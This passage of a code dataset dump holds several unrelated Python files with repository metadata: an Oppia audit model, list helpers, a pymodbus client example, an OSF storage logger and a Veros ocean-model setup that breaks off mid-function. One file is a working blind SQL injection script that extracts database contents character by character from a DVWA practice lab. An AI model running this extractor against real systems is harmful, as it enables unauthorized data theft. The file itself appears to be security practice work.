    # The role being queried for (may be unset).
    role = ndb.StringProperty(default=None, indexed=True)
    # The username in the query (may be unset).
    username = ndb.StringProperty(default=None, indexed=True)

    @staticmethod
    def get_deletion_policy():
        """Audit logs are kept for investigation purposes."""
        return base_models.DELETION_POLICY.KEEP

    @classmethod
    def has_reference_to_user_id(cls, user_id):
        """Check whether RoleQueryAuditModel exist for user.

        Args:
            user_id: str. The ID of the user whose data should be checked.

        Returns:
            bool. Whether any models refer to the given user ID.
        """
        return cls.query(cls.user_id == user_id).get() is not None
| 35.787879 | 78 | 0.720576 |
from __future__ import absolute_import
from __future__ import unicode_literals
from core.platform import models
import feconf
from google.appengine.ext import ndb
(base_models,) = models.Registry.import_models([models.NAMES.base_model])
class RoleQueryAuditModel(base_models.BaseModel):
user_id = ndb.StringProperty(required=True, indexed=True)
intent = ndb.StringProperty(required=True, choices=[
feconf.ROLE_ACTION_UPDATE,
feconf.ROLE_ACTION_VIEW_BY_ROLE,
feconf.ROLE_ACTION_VIEW_BY_USERNAME
], indexed=True)
role = ndb.StringProperty(default=None, indexed=True)
username = ndb.StringProperty(default=None, indexed=True)
@staticmethod
def get_deletion_policy():
return base_models.DELETION_POLICY.KEEP
@classmethod
def has_reference_to_user_id(cls, user_id):
return cls.query(cls.user_id == user_id).get() is not None
| true | true |
f7230caf121b3c4569353e8905f16b1c0196377f | 545 | py | Python | Modules/my_list/__init__.py | guilhermebaos/Curso-em-Video-Python | 0e67f6f59fa3216889bd2dde4a26b532c7c545fd | [
"MIT"
] | null | null | null | Modules/my_list/__init__.py | guilhermebaos/Curso-em-Video-Python | 0e67f6f59fa3216889bd2dde4a26b532c7c545fd | [
"MIT"
] | null | null | null | Modules/my_list/__init__.py | guilhermebaos/Curso-em-Video-Python | 0e67f6f59fa3216889bd2dde4a26b532c7c545fd | [
"MIT"
] | null | null | null | # Manter Ordem Alfabética
def join_list(lst, string=', '):
    """Concatenate the items of *lst* into a single string.

    :param lst: List to be joined
    :param string: Separator placed between consecutive items (coerced to str)
    :return: The joined string
    """
    separator = str(string)
    return separator.join(str(item) for item in lst)
def unique_list(lst):
    """Remove duplicate items from *lst* in place.

    Keeps the first occurrence of each value and preserves relative order.
    The original implementation scanned ``lst.index`` for every element and
    then popped duplicates back-to-front (each pop shifting the tail); this
    version does a single forward pass and a slice assignment instead, with
    the same behavior. Membership is tested with ``==`` (via ``in``), so
    unhashable items remain supported.

    :param lst: List to deduplicate (modified in place)
    :return: The same list object, without duplicates
    """
    deduped = []
    for item in lst:
        # list membership (not a set) keeps support for unhashable items
        if item not in deduped:
            deduped.append(item)
    # slice-assign so the caller's list object is mutated, as before
    lst[:] = deduped
    return lst
| 23.695652 | 73 | 0.616514 |
def join_list(lst, string=', '):
lst = str(string).join(str(x) for x in lst)
return lst
def unique_list(lst):
to_eliminate = []
for c, item in enumerate(lst):
if lst.index(item) != c:
to_eliminate += [c]
to_eliminate.sort(reverse=True)
for c in to_eliminate:
lst.pop(c)
return lst
| true | true |
f7230cb93d1f301c186795e3936835d13ed751db | 2,856 | py | Python | examples/common/async_twisted_client_serial.py | sumpfralle/pymodbus | fbdc470ae3e138c50e3659ec4ec8ebf39df58936 | [
"BSD-3-Clause"
] | 1 | 2021-01-07T01:04:55.000Z | 2021-01-07T01:04:55.000Z | examples/common/async_twisted_client_serial.py | sumpfralle/pymodbus | fbdc470ae3e138c50e3659ec4ec8ebf39df58936 | [
"BSD-3-Clause"
] | null | null | null | examples/common/async_twisted_client_serial.py | sumpfralle/pymodbus | fbdc470ae3e138c50e3659ec4ec8ebf39df58936 | [
"BSD-3-Clause"
] | 2 | 2020-12-11T19:44:35.000Z | 2022-03-29T02:24:32.000Z | #!/usr/bin/env python
"""
Pymodbus Asynchronous Client Examples
--------------------------------------------------------------------------
The following is an example of how to use the asynchronous serial modbus
client implementation from pymodbus with twisted.
"""
from twisted.internet import reactor
from pymodbus.client.asynchronous import schedulers
from pymodbus.client.asynchronous.serial import AsyncModbusSerialClient
from pymodbus.client.asynchronous.twisted import ModbusClientProtocol
import logging
logging.basicConfig()
log = logging.getLogger("pymodbus")
log.setLevel(logging.DEBUG)
# ---------------------------------------------------------------------------#
# state a few constants
# ---------------------------------------------------------------------------#
SERIAL_PORT = "/dev/ptyp0"  # serial device the RTU client attaches to
STATUS_REGS = (1, 2)   # unpacked into read_holding_registers(...) each cycle
STATUS_COILS = (1, 3)  # unpacked into read_coils(...) each cycle
CLIENT_DELAY = 1       # seconds between polling cycles (reactor.callLater)
UNIT = 0x01            # Modbus unit (slave) id
class ExampleProtocol(ModbusClientProtocol):
    """Modbus client protocol that polls holding registers and coils in a
    fixed cycle driven by the Twisted reactor.
    """

    def __init__(self, framer):
        """Initialize the protocol and schedule the first polling cycle.

        :param framer: The decoder to use to process messages
        """
        ModbusClientProtocol.__init__(self, framer)
        log.debug("Beginning the processing loop")
        reactor.callLater(CLIENT_DELAY, self.fetch_holding_registers)

    def fetch_holding_registers(self):
        """Start a cycle by requesting the status holding registers."""
        log.debug("Starting the next cycle")
        request = self.read_holding_registers(*STATUS_REGS, unit=UNIT)
        request.addCallbacks(self.send_holding_registers, self.error_handler)

    def send_holding_registers(self, response):
        """Report the register values, then request the status coils.

        :param response: The holding-register response to process
        """
        log.info(response.getRegister(0))
        log.info(response.getRegister(1))
        request = self.read_coils(*STATUS_COILS, unit=UNIT)
        request.addCallbacks(self.start_next_cycle, self.error_handler)

    def start_next_cycle(self, response):
        """Report the coil values and schedule the next polling cycle.

        :param response: The coil response to process
        """
        log.info(response.getBit(0))
        log.info(response.getBit(1))
        log.info(response.getBit(2))
        reactor.callLater(CLIENT_DELAY, self.fetch_holding_registers)

    def error_handler(self, failure):
        """Log any twisted failure raised during the cycle.

        :param failure: The error to handle
        """
        log.error(failure)
if __name__ == "__main__":
    # Build the asynchronous RTU serial client on the Twisted reactor;
    # ExampleProtocol drives the polling loop once the connection is up.
    proto, client = AsyncModbusSerialClient(schedulers.REACTOR,
                                            method="rtu",
                                            port=SERIAL_PORT,
                                            timeout=2,
                                            proto_cls=ExampleProtocol)
    proto.start()
    # proto.stop()
| 32.827586 | 78 | 0.602941 |
from twisted.internet import reactor
from pymodbus.client.asynchronous import schedulers
from pymodbus.client.asynchronous.serial import AsyncModbusSerialClient
from pymodbus.client.asynchronous.twisted import ModbusClientProtocol
import logging
logging.basicConfig()
log = logging.getLogger("pymodbus")
log.setLevel(logging.DEBUG)
SERIAL_PORT = "/dev/ptyp0"
STATUS_REGS = (1, 2)
STATUS_COILS = (1, 3)
CLIENT_DELAY = 1
UNIT = 0x01
class ExampleProtocol(ModbusClientProtocol):
def __init__(self, framer):
ModbusClientProtocol.__init__(self, framer)
log.debug("Beginning the processing loop")
reactor.callLater(CLIENT_DELAY, self.fetch_holding_registers)
def fetch_holding_registers(self):
log.debug("Starting the next cycle")
d = self.read_holding_registers(*STATUS_REGS, unit=UNIT)
d.addCallbacks(self.send_holding_registers, self.error_handler)
def send_holding_registers(self, response):
log.info(response.getRegister(0))
log.info(response.getRegister(1))
d = self.read_coils(*STATUS_COILS, unit=UNIT)
d.addCallbacks(self.start_next_cycle, self.error_handler)
def start_next_cycle(self, response):
log.info(response.getBit(0))
log.info(response.getBit(1))
log.info(response.getBit(2))
reactor.callLater(CLIENT_DELAY, self.fetch_holding_registers)
def error_handler(self, failure):
log.error(failure)
if __name__ == "__main__":
proto, client = AsyncModbusSerialClient(schedulers.REACTOR,
method="rtu",
port=SERIAL_PORT,
timeout=2,
proto_cls=ExampleProtocol)
proto.start()
| true | true |
f7230d49bc264b22acf7895aca19ce722423ce65 | 1,495 | py | Python | website/addons/osfstorage/logs.py | lbanner/osf.io | 1898ef0ff8bd91713e94c60e7463b5f81ac62caa | [
"Apache-2.0"
] | null | null | null | website/addons/osfstorage/logs.py | lbanner/osf.io | 1898ef0ff8bd91713e94c60e7463b5f81ac62caa | [
"Apache-2.0"
] | 1 | 2019-08-16T13:45:12.000Z | 2019-08-16T13:45:12.000Z | website/addons/osfstorage/logs.py | lbanner/osf.io | 1898ef0ff8bd91713e94c60e7463b5f81ac62caa | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
def build_log_urls(node, path):
    """Return the ``view`` and ``download`` URLs for *path* on the node's
    osfstorage addon.
    """
    base_url = node.web_url_for(
        'addon_view_or_download_file',
        path=path,
        provider='osfstorage'
    )
    download_url = base_url + '?action=download'
    return {'view': base_url, 'download': download_url}
class OsfStorageNodeLogger(object):
    """Append ``osf_storage_``-prefixed entries to a node's activity log."""

    def __init__(self, node, auth, path=None):
        self.node = node
        self.auth = auth
        self.path = path

    def log(self, action, extra=None, save=False):
        """Record an event on the node.

        Wraps the ``Node#add_log`` method, filling in the standard parameters
        and prefixing the action with ``osf_storage_``.

        :param str action: Log action. Should be a class constant from NodeLog.
        :param dict extra: Extra entries merged into the new log's ``params``.
        :param bool save: Whether to save the node right after logging.
        """
        params = {
            'project': self.node.parent_id,
            'node': self.node._primary_key,
        }
        # File-related events also carry the file's URLs and path.
        if self.path:
            params.update({
                'urls': build_log_urls(self.node, self.path),
                'path': self.path,
            })
        if extra:
            params.update(extra)
        prefixed_action = 'osf_storage_{0}'.format(action)
        self.node.add_log(
            action=prefixed_action,
            params=params,
            auth=self.auth,
        )
        if save:
            self.node.save()
| 28.75 | 81 | 0.564548 |
def build_log_urls(node, path):
url = node.web_url_for(
'addon_view_or_download_file',
path=path,
provider='osfstorage'
)
return {
'view': url,
'download': url + '?action=download'
}
class OsfStorageNodeLogger(object):
def __init__(self, node, auth, path=None):
self.node = node
self.auth = auth
self.path = path
def log(self, action, extra=None, save=False):
params = {
'project': self.node.parent_id,
'node': self.node._primary_key,
}
if self.path:
params.update({
'urls': build_log_urls(self.node, self.path),
'path': self.path,
})
if extra:
params.update(extra)
# Prefix the action with osf_storage_
self.node.add_log(
action='osf_storage_{0}'.format(action),
params=params,
auth=self.auth,
)
if save:
self.node.save()
| true | true |
f7230d57dbfb6edde771c92b8109ff68260dfdc4 | 2,412 | py | Python | DVWA/bsqli/medium.py | cwinfosec/practice | c0010258799aa5c9f9e5cccec2ba8515b8424771 | [
"MIT"
] | 1 | 2020-10-03T07:57:42.000Z | 2020-10-03T07:57:42.000Z | DVWA/bsqli/medium.py | cwinfosec/practice | c0010258799aa5c9f9e5cccec2ba8515b8424771 | [
"MIT"
] | null | null | null | DVWA/bsqli/medium.py | cwinfosec/practice | c0010258799aa5c9f9e5cccec2ba8515b8424771 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import requests
import string
import sys
import urllib
"""
POST /vulnerabilities/sqli_blind/ HTTP/1.1
Host: lab
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Origin: http://lab
Connection: close
Referer: http://lab/vulnerabilities/sqli_blind/
Cookie: PHPSESSID=m5do28oacr1fcpal9q7iav29u3; security=medium
Upgrade-Insecure-Requests: 1
id=1&Submit=Submit
"""
# Alias for percent-encoding; not referenced by the routines below.
urlencode = urllib.parse.quote
def loop_inject(original_inject):
    """Brute-force a single character of a boolean-blind SQL injection result.

    Substitutes the ``CHAR`` placeholder in *original_inject* with the ASCII
    code of every candidate (letters, digits, punctuation) and posts the
    payload; a response whose Content-Length differs from the baseline value
    4705 is treated as a hit.

    :param original_inject: injection template containing a ``CHAR`` placeholder
    :return: the matched character, or ``"\\n\\n"`` when no candidate matched
    """
    charset = string.ascii_letters + string.digits + string.punctuation
    target_url = "http://lab/vulnerabilities/sqli_blind/"
    session_cookies = {"PHPSESSID": "m5do28oacr1fcpal9q7iav29u3",
                       "security": "medium"}
    request_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
                       "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                       "Accept-Language": "en-US,en;q=0.5",
                       "Accept-Encoding": "gzip, deflate",
                       "Connection": "Close",
                       "Upgrade-Insecure-Requests": "1"}
    proxy_config = {"http": "http://127.0.0.1:8080",
                    "https": "https://127.0.0.1:8080"}
    for candidate in charset:
        payload = original_inject.replace("CHAR", str(ord(candidate)))
        form_data = {"id": "{}".format(payload),
                     "Submit": "Submit"}
        response = requests.post(target_url, data=form_data, headers=request_headers,
                                 cookies=session_cookies, proxies=proxy_config)
        if int(response.headers['Content-Length']) != 4705:
            return candidate
    return "\n\n"
def main():
    """Interactive shell: read a query and extract its result one character
    at a time via the blind-SQLi oracle in :func:`loop_inject`.

    Type anything containing ``quit`` to exit.
    """
    while True:
        query = input("sql> ")
        if "quit" in query:
            sys.exit(-1)
        # Extract up to 255 characters of the query result.
        for position in range(1, 256):
            injection = "1 AND ASCII(SUBSTRING(({}),{},1))=CHAR#".format(query, position)
            # Call loop_inject exactly once per position. The original called
            # it a second time just for the termination check, doubling the
            # (already heavy) HTTP traffic per extracted character.
            extracted = str(loop_inject(injection))
            sys.stdout.write(extracted)
            sys.stdout.flush()
            # loop_inject returns "\n\n" when no candidate matched -> end of value.
            if extracted == "\n\n":
                break


if __name__ == "__main__":
    main()
import requests
import string
import sys
import urllib
urlencode = urllib.parse.quote
def loop_inject(original_inject):
letters = ''.join(string.ascii_letters + string.digits + string.punctuation)
for char in letters:
edit_inject = original_inject.replace("CHAR", str(ord(char)))
burp_url = "http://lab/vulnerabilities/sqli_blind/"
burp_data = {"id":"{}".format(edit_inject),
"Submit":"Submit"}
burp_cookies = {"PHPSESSID":"m5do28oacr1fcpal9q7iav29u3",
"security":"medium"}
burp_headers = {"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language":"en-US,en;q=0.5",
"Accept-Encoding":"gzip, deflate",
"Connection":"Close",
"Upgrade-Insecure-Requests":"1"}
burp_proxy = {"http":"http://127.0.0.1:8080",
"https":"https://127.0.0.1:8080"}
r = requests.post(burp_url, data=burp_data, headers=burp_headers, cookies=burp_cookies, proxies=burp_proxy)
if int(r.headers['Content-Length']) != 4705:
return char
return "\n\n"
def main():
while True:
query = input("sql> ")
if "quit" in query:
sys.exit(-1)
for i in range(1,256):
original_inject = str("1 AND ASCII(SUBSTRING(({}),{},1))=CHAR#").format(query, i)
get_char = str(loop_inject(original_inject))
sys.stdout.write(get_char)
sys.stdout.flush()
if loop_inject(original_inject) == "\n\n":
break
main() | true | true |
f7230d9cc74110fcd7eacb880b7388d767c4d9d2 | 13,781 | py | Python | veros/setups/north_atlantic/north_atlantic.py | AkasDutta/veros | 9f530596a0148a398829050017de3e01a71261a0 | [
"MIT"
] | 115 | 2019-11-23T02:31:30.000Z | 2022-03-29T12:58:30.000Z | veros/setups/north_atlantic/north_atlantic.py | AkasDutta/veros | 9f530596a0148a398829050017de3e01a71261a0 | [
"MIT"
] | 207 | 2019-11-21T13:21:22.000Z | 2022-03-31T23:36:09.000Z | veros/setups/north_atlantic/north_atlantic.py | AkasDutta/veros | 9f530596a0148a398829050017de3e01a71261a0 | [
"MIT"
] | 21 | 2020-01-28T13:13:39.000Z | 2022-02-02T13:46:33.000Z | #!/usr/bin/env python
import os

import h5netcdf
import scipy.interpolate
import scipy.ndimage
import scipy.spatial
from PIL import Image

import veros.tools
from veros import VerosSetup, veros_routine, veros_kernel, KernelOutput
from veros.variables import Variable
from veros.core.operators import numpy as npx, update, at
# Directory containing this setup file; used to locate bundled asset files.
BASE_PATH = os.path.dirname(os.path.realpath(__file__))
# Paths to the forcing/topography assets declared in assets.json,
# resolved through the veros assets registry.
DATA_FILES = veros.tools.get_assets("north_atlantic", os.path.join(BASE_PATH, "assets.json"))
# Image mask applied on top of the ETOPO1 bathymetry (see set_topography).
TOPO_MASK_FILE = os.path.join(BASE_PATH, "topo_mask.png")
class NorthAtlanticSetup(VerosSetup):
    """A regional model of the North Atlantic, inspired by `Smith et al., 2000`_.

    Forcing and initial conditions are taken from the FLAME PyOM2 setup. Bathymetry
    data from ETOPO1 (resolution of 1 arcmin).

    Boundary forcings are implemented via sponge layers in the Greenland Sea, by the
    Strait of Gibraltar, and in the South Atlantic. This setup runs with arbitrary resolution;
    upon changing the number of grid cells, all forcing files will be interpolated to
    the new grid. Default resolution corresponds roughly to :math:`0.5 \\times 0.25` degrees.

    .. _Smith et al., 2000:
       http://journals.ametsoc.org/doi/10.1175/1520-0485%282000%29030%3C1532%3ANSOTNA%3E2.0.CO%3B2
    """

    # Eastern and northern domain edges in degrees; the western/southern edges
    # come from settings.x_origin / settings.y_origin (see set_parameter).
    x_boundary = 17.2
    y_boundary = 70.0
    # Deepest model level in meters.
    max_depth = 5800.0

    @veros_routine
    def set_parameter(self, state):
        """Set all model settings, register the monthly-climatology dimension
        and declare the extra forcing variables this setup needs.
        """
        settings = state.settings
        settings.identifier = "na"
        # Grid size and placement of the south-west corner (degrees).
        settings.nx, settings.ny, settings.nz = 250, 350, 50
        settings.x_origin = -98.0
        settings.y_origin = -18.0
        settings.dt_mom = 3600.0 / 2.0
        settings.dt_tracer = 3600.0 / 2.0
        settings.runlen = 86400 * 365.0 * 10.0
        settings.coord_degree = True
        # Isoneutral / skew diffusion parameters.
        settings.enable_neutral_diffusion = True
        settings.enable_skew_diffusion = True
        settings.K_iso_0 = 1000.0
        settings.K_iso_steep = 200.0
        settings.iso_dslope = 1.0 / 1000.0
        settings.iso_slopec = 4.0 / 1000.0
        # Lateral friction with cos(latitude) scaling.
        settings.enable_hor_friction = True
        settings.A_h = 1e3
        settings.enable_hor_friction_cos_scaling = True
        settings.hor_friction_cosPower = 1
        # Required for the sponge-layer restoring terms (see set_forcing_kernel).
        settings.enable_tempsalt_sources = True
        settings.enable_implicit_vert_friction = True
        # TKE closure for vertical mixing.
        settings.enable_tke = True
        settings.c_k = 0.1
        settings.c_eps = 0.7
        settings.alpha_tke = 30.0
        settings.mxl_min = 1e-8
        settings.tke_mxl_choice = 2
        settings.kappaM_min = 2e-4
        settings.kappaH_min = 2e-5
        settings.enable_kappaH_profile = True
        settings.K_gm_0 = 1000.0
        settings.enable_eke = False
        settings.enable_idemix = False
        settings.eq_of_state_type = 5
        # All surface and sponge forcings are monthly climatologies.
        state.dimensions["nmonths"] = 12
        # NOTE(review): wind-stress units below are labelled "N/s^2" —
        # likely meant "N/m^2"; confirm before relying on the metadata.
        state.var_meta.update(
            {
                "sss_clim": Variable("sss_clim", ("xt", "yt", "nmonths"), "g/kg", "Monthly sea surface salinity"),
                "sst_clim": Variable("sst_clim", ("xt", "yt", "nmonths"), "deg C", "Monthly sea surface temperature"),
                "sss_rest": Variable(
                    "sss_rest", ("xt", "yt", "nmonths"), "g/kg", "Monthly sea surface salinity restoring"
                ),
                "sst_rest": Variable(
                    "sst_rest", ("xt", "yt", "nmonths"), "deg C", "Monthly sea surface temperature restoring"
                ),
                "t_star": Variable(
                    "t_star", ("xt", "yt", "zt", "nmonths"), "deg C", "Temperature sponge layer forcing"
                ),
                "s_star": Variable("s_star", ("xt", "yt", "zt", "nmonths"), "g/kg", "Salinity sponge layer forcing"),
                "rest_tscl": Variable("rest_tscl", ("xt", "yt", "zt"), "1/s", "Forcing restoration time scale"),
                "taux": Variable("taux", ("xt", "yt", "nmonths"), "N/s^2", "Monthly zonal wind stress"),
                "tauy": Variable("tauy", ("xt", "yt", "nmonths"), "N/s^2", "Monthly meridional wind stress"),
            }
        )

    @veros_routine
    def set_grid(self, state):
        """Uniform horizontal spacing in degrees; Vinokur-stretched vertical
        levels (minimum step 10 m, refined towards the lower end — see
        ``veros.tools.get_vinokur_grid_steps``).
        """
        vs = state.variables
        settings = state.settings
        vs.dxt = update(vs.dxt, at[2:-2], (self.x_boundary - settings.x_origin) / settings.nx)
        vs.dyt = update(vs.dyt, at[2:-2], (self.y_boundary - settings.y_origin) / settings.ny)
        vs.dzt = veros.tools.get_vinokur_grid_steps(settings.nz, self.max_depth, 10.0, refine_towards="lower")

    @veros_routine
    def set_coriolis(self, state):
        """Spherical Coriolis parameter f = 2 * omega * sin(latitude)."""
        vs = state.variables
        settings = state.settings
        vs.coriolis_t = update(
            vs.coriolis_t, at[...], 2 * settings.omega * npx.sin(vs.yt[npx.newaxis, :] / 180.0 * settings.pi)
        )

    @veros_routine(dist_safe=False, local_variables=["kbot", "xt", "yt", "zt"])
    def set_topography(self, state):
        """Derive the index of the lowest wet level (``kbot``) from the ETOPO1
        bathymetry, masked by ``topo_mask.png`` and smoothed to the model grid.
        """
        vs = state.variables
        settings = state.settings
        with h5netcdf.File(DATA_FILES["topography"], "r") as topo_file:
            topo_x, topo_y, topo_bottom_depth = (self._get_data(topo_file, k) for k in ("x", "y", "z"))
        # Cells flagged in the mask image are forced to zero depth (land).
        topo_mask = npx.flipud(npx.asarray(Image.open(TOPO_MASK_FILE))).T
        topo_bottom_depth = npx.where(topo_mask, 0, topo_bottom_depth)
        # Smooth with a kernel proportional to the coarsening factor of the grid.
        topo_bottom_depth = scipy.ndimage.gaussian_filter(
            topo_bottom_depth, sigma=(len(topo_x) / settings.nx, len(topo_y) / settings.ny)
        )
        interp_coords = npx.meshgrid(vs.xt[2:-2], vs.yt[2:-2], indexing="ij")
        interp_coords = npx.rollaxis(npx.asarray(interp_coords), 0, 3)
        # NOTE(review): scipy.interpolate is used here but only scipy.spatial /
        # scipy.ndimage are imported at module level; this relies on SciPy's
        # lazy submodule loading — consider importing scipy.interpolate explicitly.
        z_interp = scipy.interpolate.interpn(
            (topo_x, topo_y), topo_bottom_depth, interp_coords, method="nearest", bounds_error=False, fill_value=0
        )
        # Negative depths are ocean: pick the nearest model level; otherwise land (0).
        vs.kbot = update(
            vs.kbot,
            at[2:-2, 2:-2],
            npx.where(
                z_interp < 0.0,
                1 + npx.argmin(npx.abs(z_interp[:, :, npx.newaxis] - vs.zt[npx.newaxis, npx.newaxis, :]), axis=2),
                0,
            ),
        )
        vs.kbot = npx.where(vs.kbot < settings.nz, vs.kbot, 0)

    def _get_data(self, f, var):
        """Retrieve variable *var* from h5netcdf file *f*, transposed."""
        var_obj = f.variables[var]
        return npx.array(var_obj).T

    @veros_routine(
        dist_safe=False,
        local_variables=[
            "tau",
            "xt",
            "yt",
            "zt",
            "temp",
            "maskT",
            "salt",
            "taux",
            "tauy",
            "sst_clim",
            "sss_clim",
            "sst_rest",
            "sss_rest",
            "t_star",
            "s_star",
            "rest_tscl",
        ],
    )
    def set_initial_conditions(self, state):
        """Read initial temperature/salinity, monthly wind stress, surface
        restoring fields and sponge-layer targets from the forcing assets and
        interpolate them onto the model grid.
        """
        vs = state.variables
        with h5netcdf.File(DATA_FILES["forcing"], "r") as forcing_file:
            t_hor = (vs.xt[2:-2], vs.yt[2:-2])
            t_grid = (vs.xt[2:-2], vs.yt[2:-2], vs.zt)
            forc_coords = [self._get_data(forcing_file, k) for k in ("xt", "yt", "zt")]
            forc_coords[0] = forc_coords[0] - 360
            # Scale by -0.01 and reverse the depth axis — presumably converting
            # positive-down cm levels to negative-down meters; confirm against the asset.
            forc_coords[2] = -0.01 * forc_coords[2][::-1]
            temp_raw = self._get_data(forcing_file, "temp_ic")[..., ::-1]
            temp = veros.tools.interpolate(forc_coords, temp_raw, t_grid, missing_value=-1e20)
            vs.temp = update(vs.temp, at[2:-2, 2:-2, :, vs.tau], vs.maskT[2:-2, 2:-2, :] * temp)
            salt_raw = self._get_data(forcing_file, "salt_ic")[..., ::-1]
            salt = 35.0 + 1000 * veros.tools.interpolate(forc_coords, salt_raw, t_grid, missing_value=-1e20)
            vs.salt = update(vs.salt, at[2:-2, 2:-2, :, vs.tau], vs.maskT[2:-2, 2:-2, :] * salt)
            # Wind stress lives on the u-grid; the /10 is presumably a unit
            # conversion (e.g. dyn/cm^2 -> N/m^2) — confirm against the asset.
            forc_u_coords_hor = [self._get_data(forcing_file, k) for k in ("xu", "yu")]
            forc_u_coords_hor[0] = forc_u_coords_hor[0] - 360
            taux = self._get_data(forcing_file, "taux")
            tauy = self._get_data(forcing_file, "tauy")
            for k in range(12):
                vs.taux = update(
                    vs.taux,
                    at[2:-2, 2:-2, k],
                    (veros.tools.interpolate(forc_u_coords_hor, taux[..., k], t_hor, missing_value=-1e20) / 10.0),
                )
                vs.tauy = update(
                    vs.tauy,
                    at[2:-2, 2:-2, k],
                    (veros.tools.interpolate(forc_u_coords_hor, tauy[..., k], t_hor, missing_value=-1e20) / 10.0),
                )
            # heat flux and salinity restoring (scaling factors 41868.0 and /100
            # are unit conversions inherited from the FLAME forcing files)
            sst_clim, sss_clim, sst_rest, sss_rest = [
                forcing_file.variables[k][...].T for k in ("sst_clim", "sss_clim", "sst_rest", "sss_rest")
            ]
            for k in range(12):
                vs.sst_clim = update(
                    vs.sst_clim,
                    at[2:-2, 2:-2, k],
                    veros.tools.interpolate(forc_coords[:-1], sst_clim[..., k], t_hor, missing_value=-1e20),
                )
                vs.sss_clim = update(
                    vs.sss_clim,
                    at[2:-2, 2:-2, k],
                    (veros.tools.interpolate(forc_coords[:-1], sss_clim[..., k], t_hor, missing_value=-1e20) * 1000 + 35),
                )
                vs.sst_rest = update(
                    vs.sst_rest,
                    at[2:-2, 2:-2, k],
                    (veros.tools.interpolate(forc_coords[:-1], sst_rest[..., k], t_hor, missing_value=-1e20) * 41868.0),
                )
                vs.sss_rest = update(
                    vs.sss_rest,
                    at[2:-2, 2:-2, k],
                    (veros.tools.interpolate(forc_coords[:-1], sss_rest[..., k], t_hor, missing_value=-1e20) / 100.0),
                )
        with h5netcdf.File(DATA_FILES["restoring"], "r") as restoring_file:
            rest_coords = [self._get_data(restoring_file, k) for k in ("xt", "yt", "zt")]
            rest_coords[0] = rest_coords[0] - 360
            # sponge layers: restoring time scale and monthly target fields
            vs.rest_tscl = update(
                vs.rest_tscl,
                at[2:-2, 2:-2, :],
                veros.tools.interpolate(rest_coords, self._get_data(restoring_file, "tscl")[..., 0], t_grid),
            )
            t_star = self._get_data(restoring_file, "t_star")
            s_star = self._get_data(restoring_file, "s_star")
            for k in range(12):
                vs.t_star = update(
                    vs.t_star,
                    at[2:-2, 2:-2, :, k],
                    veros.tools.interpolate(rest_coords, t_star[..., k], t_grid, missing_value=0.0),
                )
                vs.s_star = update(
                    vs.s_star,
                    at[2:-2, 2:-2, :, k],
                    veros.tools.interpolate(rest_coords, s_star[..., k], t_grid, missing_value=0.0),
                )

    @veros_routine
    def set_forcing(self, state):
        """Apply the time-interpolated surface and sponge forcing (computed by
        :func:`set_forcing_kernel`) for the current time step.
        """
        vs = state.variables
        vs.update(set_forcing_kernel(state))

    @veros_routine
    def set_diagnostics(self, state):
        """Write snapshots and 10-day averages of the main prognostic fields."""
        diagnostics = state.diagnostics
        settings = state.settings
        diagnostics["snapshot"].output_frequency = 3600.0 * 24 * 10
        diagnostics["averages"].output_frequency = 3600.0 * 24 * 10
        diagnostics["averages"].sampling_frequency = settings.dt_tracer
        diagnostics["averages"].output_variables = [
            "temp",
            "salt",
            "u",
            "v",
            "w",
            "surface_taux",
            "surface_tauy",
            "psi",
        ]
        diagnostics["cfl_monitor"].output_frequency = settings.dt_tracer * 10

    @veros_routine
    def after_timestep(self, state):
        # No per-timestep post-processing is needed for this setup.
        pass
@veros_kernel
def set_forcing_kernel(state):
    """Interpolate the monthly forcing climatologies to the current model time
    and compute surface wind stress, surface TKE forcing, surface heat and
    salinity fluxes, and the sponge-layer restoring tendencies.
    """
    vs = state.variables
    settings = state.settings

    # Interpolation weights (f1, f2) between the two bracketing climatology
    # months (n1, n2), based on a 360-day model year.
    year_in_seconds = 360 * 86400.0
    (n1, f1), (n2, f2) = veros.tools.get_periodic_interval(vs.time, year_in_seconds, year_in_seconds / 12.0, 12)
    vs.surface_taux = f1 * vs.taux[:, :, n1] + f2 * vs.taux[:, :, n2]
    vs.surface_tauy = f1 * vs.tauy[:, :, n1] + f2 * vs.tauy[:, :, n2]
    if settings.enable_tke:
        # Surface TKE input ~ (|tau| / rho_0)^(3/2), with the stress
        # components averaged onto the T grid.
        vs.forc_tke_surface = update(
            vs.forc_tke_surface,
            at[1:-1, 1:-1],
            npx.sqrt(
                (0.5 * (vs.surface_taux[1:-1, 1:-1] + vs.surface_taux[:-2, 1:-1]) / settings.rho_0) ** 2
                + (0.5 * (vs.surface_tauy[1:-1, 1:-1] + vs.surface_tauy[1:-1, :-2]) / settings.rho_0) ** 2
            )
            ** 1.5,
        )
    # Specific heat used for the heat-flux conversion (J / (kg K)) —
    # presumably the TEOS-10 reference value for sea water.
    cp_0 = 3991.86795711963
    # Newtonian restoring of surface temperature and salinity towards the
    # monthly climatologies, weighted by the restoring strengths.
    vs.forc_temp_surface = (
        (f1 * vs.sst_rest[:, :, n1] + f2 * vs.sst_rest[:, :, n2])
        * (f1 * vs.sst_clim[:, :, n1] + f2 * vs.sst_clim[:, :, n2] - vs.temp[:, :, -1, vs.tau])
        * vs.maskT[:, :, -1]
        / cp_0
        / settings.rho_0
    )
    vs.forc_salt_surface = (
        (f1 * vs.sss_rest[:, :, n1] + f2 * vs.sss_rest[:, :, n2])
        * (f1 * vs.sss_clim[:, :, n1] + f2 * vs.sss_clim[:, :, n2] - vs.salt[:, :, -1, vs.tau])
        * vs.maskT[:, :, -1]
    )
    # Crude sea-ice mask: suppress further surface cooling (and the associated
    # salt flux) where the surface layer is at or below -1.8 deg C.
